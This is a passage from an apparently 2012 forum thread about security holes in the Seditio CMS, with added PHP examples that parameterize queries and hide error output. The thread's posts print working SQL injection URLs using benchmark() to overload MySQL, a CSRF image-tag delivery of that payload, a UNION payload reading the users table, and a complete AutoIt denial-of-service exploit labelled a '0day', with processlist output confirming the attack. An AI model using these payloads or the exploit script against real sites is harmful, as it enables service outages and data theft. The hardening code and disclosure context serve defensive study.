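The hits filter above takes $v from the request and interpolates it into "... WHERE stat_name LIKE '$v%'", which is what lets a quote end the literal and a UNION or benchmark() follow it; the "Data too long for column 'user_occupation'" message in this post and in the first one is the separate problem of a failed query's driver error being printed to the user (the mysql_error() that BlackMinD later suggests taking out of sed_sql_query()). The following added example, not Seditio's code, serves both: it whitelists the filter value, binds it as a query parameter, logs query failures instead of showing them, and re-checks the form's maxlength on the server. PDO with an in-memory SQLite table stands in for sed_sql_query() and the real stats table (names assumed), and the assumption that stat_name holds a date prefix follows from the LIKE '$v%' in the original:

```php
<?php
// Added example, not Seditio's code: hardening the hits filter from
// admin.hits.inc.php. Three changes are shown: the value is validated against
// the only shapes the filter needs (YYYY for f=year, YYYY-MM for f=month),
// it is bound as a query parameter, and query failures are logged instead of
// being shown to the user. PDO with an in-memory SQLite table stands in for
// sed_sql_query() and the real stats table (hypothetical names). Requires
// the pdo_sqlite extension.

// Whitelist the filter value. Anything else (quotes, UNION, benchmark()) is
// refused before it gets anywhere near the query.
function hits_filter_ok($f, $v)
{
    if ($f === 'year') {
        return (bool) preg_match('/^\d{4}$/', $v);
    }
    if ($f === 'month') {
        return (bool) preg_match('/^\d{4}-(0[1-9]|1[0-2])$/', $v);
    }
    return false;
}

// $table comes from code, never from the request; only $v is user input.
function hits_query(PDO $db, $f, $v, $table = 'sed_stats')
{
    if (!hits_filter_ok($f, $v)) {
        // Log the rejected value hex-encoded (no log injection), answer with
        // Seditio's generic text and never echo $v back to the browser.
        error_log("hits: rejected filter f=$f v=" . bin2hex($v));
        throw new InvalidArgumentException('Wrong parameter in the URL.');
    }
    // Bound parameter: a quote in $v can no longer end the string literal.
    // The whitelist admits only digits and '-', so no LIKE wildcard escaping
    // is needed for the prefix.
    $st = $db->prepare("SELECT stat_name, stat_value FROM $table WHERE stat_name LIKE ? ORDER BY stat_name DESC");
    $st->execute(array($v . '%'));
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Replacement for the "or die(mysql_error())" pattern behind the
// "Data too long for column 'user_occupation'" disclosure: the driver's
// message goes to the server log, the user gets nothing query-specific.
function safe_hits_query(PDO $db, $f, $v, $table = 'sed_stats')
{
    try {
        return hits_query($db, $f, $v, $table);
    } catch (PDOException $e) {
        error_log('SQL error: ' . $e->getMessage());
        return array();
    }
}

// Server-side counterpart of the form's maxlength="64": the browser limit is
// advisory only, so the length is re-checked before the UPDATE. Byte length
// is used, which is never smaller than the character count, so a value that
// passes here fits the column.
function profile_field_ok($value, $max)
{
    return strlen($value) <= $max;
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sed_stats (stat_name TEXT, stat_value INTEGER)');
$db->exec("INSERT INTO sed_stats VALUES ('2012-04-12', 5), ('2012-03-31', 2), ('2011-12-01', 9)");

print_r(safe_hits_query($db, 'year', '2012'));
print_r(safe_hits_query($db, 'month', '2011-12'));
print_r(safe_hits_query($db, 'year', '2012', 'no_such_table'));   // failure is logged, not shown

// The injected value from the advisory is stopped by the whitelist alone.
$injected = "1' union select 1,user_name from sed170_users limit 1-- or'1'!='1--";
try {
    hits_query($db, 'year', $injected);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
var_dump(profile_field_ok(str_repeat('A', 200), 64));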


Ferid23 (Admin), 2012-04-12 14:47 GMT


BlackMinD and MetaizM, congratulations! You've done a great job.
PS: At this rate nobody will use seditio anymore)))


TheRock (Gold), 2012-04-12 16:30 GMT


Thank you very much for researching these and spending your valuable time on it.
I want to touch on the same topic.
1. Version 170 has not been released for use yet; I myself knew beforehand that db tools would create threats, and I'm sure this db tools will not be in the new version.
2. The SFQuick Ban addon is in use optionally.
3. The PM Okuma addon is in use optionally. (If you say you absolutely want to use it, as a shortcut you can chmod 444 the pmoku addon's files.)
4. I tested most of these discovered holes on a server that provides hosting services and in the end did not run into any threat, but I tested them on Apache and got the result I expected. I think we shouldn't confuse an unconfigured Apache system with a configured Apache system. Not only Seditio; if we poke at all the other CMS systems too, lots of flaws would surface, but Step, you also know well that the Seditio system is more secure than other CMS systems. You just have to be a webmaster to use it. Most of those who come here are in the business of breaking and wrecking )) Of course mostly thanks to masters like you who find holes.

5. In the last quote you shared, Error: Title of your site 2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1, I couldn't get this result; instead I ran into a result like 2012-04-12 14:03 Fatal Error : Wrong parameter in the URL. I think here too the Apache difference comes into play. In short, what I want to say is that you may not always get the same result on real hosting as what you check on your PC.

Still, I'll always be waiting for new news from you about Seditio security. The more we know about such holes, the more we'll be able to bring the system to a trustworthy state.


Dj_Taleh (Banned), 2012-04-12 16:32 GMT


Thanks a lot, bro

Respect +5


MetaizM (Gold), 2012-04-12 16:52 GMT


I took a look at this part:
Overload the MySQL server: (As a result the MySQL server goes down + high CPU load; in other words: create a denial of service through SQL injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF, especially if you have no access to the system as admin.
E.g.:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
Here, Step, you've shown that with a plain iframe, by steering the admin to the page, you get a denial of service / MySQL overload ))))
This turned out to be the most attractive vuln


BlackMinD (Pr0grammer), 2012-04-13 02:15 GMT


Thanks to you too
@2. The SFQuick Ban addon is in use optionally.
I wouldn't recommend it, because it has CSRF; it's not only that whoever uses it will be vulnerable, by abusing it other users and the admin too can be banned.
If I have time I'll implement anti-CSRF for it; Seditio's own sed_xg() function is enough.
The CSRF must definitely be fixed so that the admin can have peace of mind too.
On the other hand, look for yourselves: most plugins are from 2007, i.e. outdated. AND not supported by their authors.
Before using them I'd recommend checking the bugtracks. Also, IMO there's no need to use lots of unnecessary plugins. Whichever are unnecessary, delete them from the site at the file level and that's enough.
@3. The PM Okuma addon is in use optionally. (If you say you absolutely want to use it, as a shortcut you can chmod 444 the pmoku addon's files.)
Plain htmlentities() and that's it. chmod 444 makes no sense, because this is XSS, i.e. a client-side vuln.
@4 I agree. But it depends on which vulns. Server configuration has a role too, but let's not forget that in the hands of a skilled person, in 99% of cases these vulns can be made universal and can work regardless of server configuration.
@5 is because you made a mistake in the test. There maxlength=64; you can't do it from a normal browser, because the browser doesn't let you exceed that limit, but an attacker can do it in 2 seconds, for example with a Minibrowser.
&x= there is the anti-CSRF token; don't post that one, use the &x you are currently using. See how it will expose. It said Wrong input because you used the &x shown here; there's no need for that, use the &x from your own current session + do it with a minibrowser and you'll get the same result.
In plain language, what is that expose?
mysql_query("SELECT BLA BLA from BLA2 etc...") or die(mysql_error());
If I'm not mistaken, in the function called sed_sql_query() the mysql_error() can be removed and a redirect to the index given; that ends the expose.

Virtualbox is off now, otherwise I'd take a screenshot (I'm a bit tired, sorry, no energy)

Thanks to you too.

P.S. the seditio chat plugin has CSRF in the same way; it's not dangerous, on the contrary it's funny) (for messing around)
http://packetstormsecurity.org/files/111757/Seditio-Chat-1.0-Cross-Site-Request-Forgery.html


CwGhost (VIP), 2012-04-13 08:39 GMT


thanks

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

XEY (VIP), 2012-04-13 11:51 GMT


TheRock, you're great!


BlackMinD (Pr0grammer), 2012-04-14 00:05 GMT


))))
Yadıvızda saxlayın)
Kaan TRUE STYLE TROLLY VƏ noobdur)
Əminəmki onun "editlədiyi" seditio ümumiyyətlə vulnlarla doludur)
Proof: bu adam vuln nədir bilmir.Bu da azmış kimi lezvadır))))))
Onun htmlspecialchars() dan istifadəsində bunu görə bilərsiniz)))))))))
Print screen də verirəm sonra kimsə inciməsin)))))
[img]

Görürəm yaman nanay-nanay eliyir vuln yoxdur onda soxsun gözünə2si də var privatedir xüsusəndə belə nooblara vurmaq üçün.0Day etmiyəcəyəm)

http://packetstormsecurity.org/files/111814/seditio170-sqlxsrf.txt
http://s019.radikal.ru/i607/1204/e1/18fec897ca05.png

http://seditio-eklenti.com/seditio-sql-injection-hakkinda-bilgilendirme-m1888.html

So, bad news especially for Seditio servers: Kaan is a noob.
If the vulns I found weren't vulns, they wouldn't be published on world-famous sites! Because all of them are checked in lab conditions.
I'm copy/pasting the noob's post so it goes down in history))))

Code:
http://s019.radikal.ru/i607/1204/e1/18fec897ca05.png
http://seditio-eklenti.com/seditio-sql-injection-hakkinda-bilgilendirme-m1888.html

Seditio SQL Injection

I felt the need to write this post because of the SQL injection vulnerabilities that have recently come out concerning Seditio.
You should know that there is currently no SQL injection vulnerability in Seditio.
Those who claim one is known or exists are needlessly leaving Seditio users in doubt.
Now I will give you the necessary information about the vulnerabilities claimed to exist, one by one.

1. Users.php
Related topic: http://seditio-eklenti.com/sedit.....1845.html
First of all, you should know that this is not a vulnerability.

Explanation: When the $s variable defined in Seditio is called in a different way, it will give an error.
As you can see, the operation gives an error; here the helper code that prints the error to the screen kicks in and lets you see the error. This is not an SQL vulnerability: when code other than the defined code is called, the system will naturally give an error when you look for something that does not exist in SQL.
What did we do in the FIX? We prevented the error from being printed to the screen, nothing else; the error is still there, the user just can't see it.

2. $get['w'] and others
Related topic: http://seditio-eklenti.com/sedit.....1880.html

Explanation: The same thing I described above applies here; since the relevant variables are defined in the system, they give an error when called in an undefined way. It is not any kind of SQL injection vulnerability.
Again, what did we do in the relevant patch? We only prevented the error from being printed to the screen.

3. PM Okuma plugin
Related topic: http://seditio-eklenti.com/sedit.....1884.html

Explanation: There is a vulnerability in the plugin, but it definitely poses no problem; since only the admin sees it, there is no risk whatsoever.
The problem in the plugin can be fixed.
Solution:
Code:
$plugin_body .= "<td>$pm_title</td>";
$plugin_body .= "<td>$pm_text</td>";

Change it as below.
Code:
$plugin_body .= "<td>htmlspecialchars($pm_title)</td>";
$plugin_body .= "<td>htmlspecialchars($pm_text)</td>";

Or like this
Code:
$plugin_body .= "<td>sed_cc($pm_title)</td>";
$plugin_body .= "<td>sed_cc($pm_text)</td>";

4. DBTools security issue
Related topic: http://seditio-eklenti.com/sedit.....1886.html

Explanation: There is definitely no such problem or vulnerability.
What is done here is simply tricking the admin; nothing else is involved, and it is not something specific to this plugin. You could do the same with a topic link there, and the admin deletes that topic without looking. This does not apply only to Seditio; the same thing can be done to ALL CMS and FORUM systems. There is no vulnerability; as I said, it is just a game of tricking the admin.

5. Chat plugin security issue
Related topic: http://seditio-eklenti.com/sedit.....1887.html

Explanation: Like DbTools, this is also something done by tricking the admin; it does not constitute any vulnerability.

Apart from these, nothing else is known at the moment, or at least I don't know of anything.

SEDITIO USERS SHOULD NOT WORRY IN ANY WAY. THERE IS NO SECURITY VULNERABILITY; PEOPLE ARE JUST GOING AROUND SPREADING GOSSIP AND MUDDYING OTHERS' MINDS, THAT'S ALL. DO NOT TRUST ANYONE ON THESE MATTERS.


If you have questions or there is anything we need to know, please write.
Bi Dünya Müzik: http://bdmfan.com
Don't believe those who spread GOSSIP saying there is a vulnerability in Seditio.
Seditio is now more secure and faster. Feel the power.



User
    2012-04-14 13:55 GMT                 

PuN!Sh3r (Gold)


Look at this talk: it gives an error but it's not SQL inj
Why don't you give him the step injection? Let him gather his wits, maybe he'll come to his senses

Long live the Motherland!
Farewell, mist; farewell, mountain..

User
    2012-04-14 17:46 GMT                 

BlackMinD (Pr0grammer)


He has already been given his shot, what else is there left to give him)

Next 0day (exploit http://pastebin.com/HWqYxsiR)
Code:
#cs
Seditio 165 (noob Kaan's edition from seditio-eklenti.com)
Denial Of Service exploit by AkaStep.
We will exploit Sql injection using this exploit and as result we will cause Denial of Service.
Mysql server will go down or will overloaded +server will get overloaded(High CPU Load).
// Vuln Discovered By AkaStep + exploit By AkaStep.
Enjoyyyyy)
NOTES: Do not login to target site otherwise it will fail exploit it vuln.
Exploit Coded in Autoit.See autoitscript.com


Details about Vuln:(Magic_Quotes_gpc=off)

//seditio165 from seditio-eklenti.com [Noob Kaan edition)))))))] [Usefull for Denial of service -Sql injection]
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep
[code]
//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{

$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}
/14 April 2012

#ce


$targetsite="http://192.168.0.15:80/learn/128/sed/seditio165/"; //target site. Change it to target site.



#cs
DO NOT TOUCH ANYTHING BELOW


#ce

$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.

HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit

#cs

Here is how this process looks like from server's mysql:
worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case.

mysql> show full processlist \G
*************************** 4. row ***************************
     Id: 5
   User: sed165
   Host: worker.com:1632
     db: sed165
Command: Query
   Time: 411
  State: Updating
   Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))
),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1'
*************************** 5. row ***************************
     Id: 6
   User: root
   Host: localhost:2658
     db: sed165
Command: Query
   Time: 0
  State: NULL
   Info: show full processlist
*************************** 6. row ***************************
     Id: 7
   User: sed165
   Host: worker.com:1633
     db: sed165
Command: Query
   Time: 69
  State: Waiting for table level lock
   Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1'
6 rows in set (0.00 sec)

mysql>


#ce


Code:
//seditio165 from seditio-eklenti.com [Noob Kaan edition)))))))] [Usefull for Denial of service -Sql injection]
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep

//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{

$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}


Exploit:
First make any HTTP GET request to the target site, domain/forums.php, for example: GET http://site.com/forums.php
Then exploit: where rd_ip='192.168.0.1' is your IP address (use a mini-browser or combine it with AutoIt)
http://192.168.0.15:80/learn/128/sed/seditio165/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='192.168.0.1',rd_lastseen='
Code:
mysql> show full processlist \G
*************************** 7. row ***************************
     Id: 1203
   User: sed165
   Host: 192.168.0.1:1472
     db: sed165
Command: Query
   Time: 915 // <------------ it has been running for 915 seconds))
  State: Updating
   Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now()))))
,rd_ip='192.168.0.1',rd_lastseen='1',rd_lastseen='1334404098' WHERE rd_ip='192.168.0.1'
7 rows in set (0.00 sec)

mysql> select 915/60 \g
+---------+
| 915/60  |
+---------+
| 15.2500 |
+---------+
1 row in set (0.00 sec)
//~ it has been running for about 15 minutes.

mysql> select * from sed_redirecter \g


No response from the MySQL server.


HTTP RESPONSE:
Code:
cmd> GET /learn/128/sed/seditio165/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='192.168.0.1',rd_lastseen='1 HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15:80/learn/128/sed/seditio165/message.php?msg=930&redirect=L2xlYXJuLzEyOC9zZWQvc2VkaXRpbzE2NS9wbHVnLnBocD9lPXNpa2RpcicscmRfbG9jYXRpb249KHNlbGVjdCsxKSxyZF9pcD0nT3duZWQnLHJkX2xhc3RzZWVuPScxMjMnPScx
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host: 192.168.0.15
cmd> Cookie: ASPX=7o818e5qfsgdbg9mljc00t0vhulfu9rp; SEDITIO=MDpfOjA6Xzo4eWVhcnM%3D
cmd>


Notice that there is no HTTP status code. The response should have been HTTP XXX, where XXX should be status code 200.
In our case there isn't one, meaning the server is down.
CPU: Intel Pentium 4 3.2 GHz; minimum CPU load during the denial of service 63-65%, max 72% (How about that?)



Enjoyyy)))))

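The UPDATE in system/common.php quoted in the post above is the root of the denial of service: $rd_loc and $rd_extra are concatenated into the SQL text, so one quote in the ?e= parameter ends the literal and the rest of the URL is executed as SQL. As an added example that is not part of the thread or of Seditio, this is the same statement with the values bound as parameters, and with the mysql_error() exposure mentioned earlier in the thread handled by logging instead of echoing; $db (an open mysqli connection, replacing the sed_sql_query() wrapper) and the 255-character column width are assumptions.

```php
<?php
// Added example, not Seditio's or the poster's code: a hardened replacement for
// the sed_redirecter UPDATE from system/common.php quoted in the thread.
// Root cause there: $rd_loc (derived from the request URI) and $rd_extra were
// concatenated into the SQL string, so a single quote in ?e= closed the literal
// and the remainder of the URL became SQL (the benchmark() DoS seen in the
// processlist output above).
// Assumptions: $db is an open mysqli connection (Seditio's own sed_sql_query()
// wrapper is bypassed here); column names are those of the quoted query.

function sed_redirecter_update(mysqli $db, $rd_loc, $rd_extra)
{
    // Same exclusion as the original code.
    if ($rd_loc === 'users.php' || $rd_loc === 'message.php') {
        return true;
    }

    // Defense in depth: a location is a relative script path plus query string,
    // so refuse control characters and cap the length (255 is an assumed
    // column width; adjust it to the real schema).
    $location = $rd_loc . $rd_extra;
    if (strlen($location) > 255 || preg_match('/[\x00-\x1f\x7f]/', $location)) {
        return false;
    }

    $ip  = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    $now = (string) time(); // the original also wrote time() as a quoted value

    // Placeholders keep request data out of the query text: the server sees
    // exactly three parameters, whatever quotes or SQL functions $location holds.
    $stmt = $db->prepare(
        'UPDATE sed_redirecter SET rd_location = ?, rd_lastseen = ? WHERE rd_ip = ?'
    );
    if ($stmt === false) {
        // Log server-side instead of echoing mysql_error() to the visitor, as
        // suggested earlier in the thread; the error text would otherwise
        // disclose table and column names.
        error_log('sed_redirecter prepare failed: ' . $db->error);
        return false;
    }
    $stmt->bind_param('sss', $location, $now, $ip);
    $ok = $stmt->execute();
    if (!$ok) {
        error_log('sed_redirecter update failed: ' . $stmt->error);
    }
    $stmt->close();
    return $ok;
}
```

A long-running UPDATE on sed_redirecter in SHOW FULL PROCESSLIST, like the 915-second one shown above, is the symptom to watch for on an unpatched install; with bound parameters the injected benchmark() is stored as text and never executed.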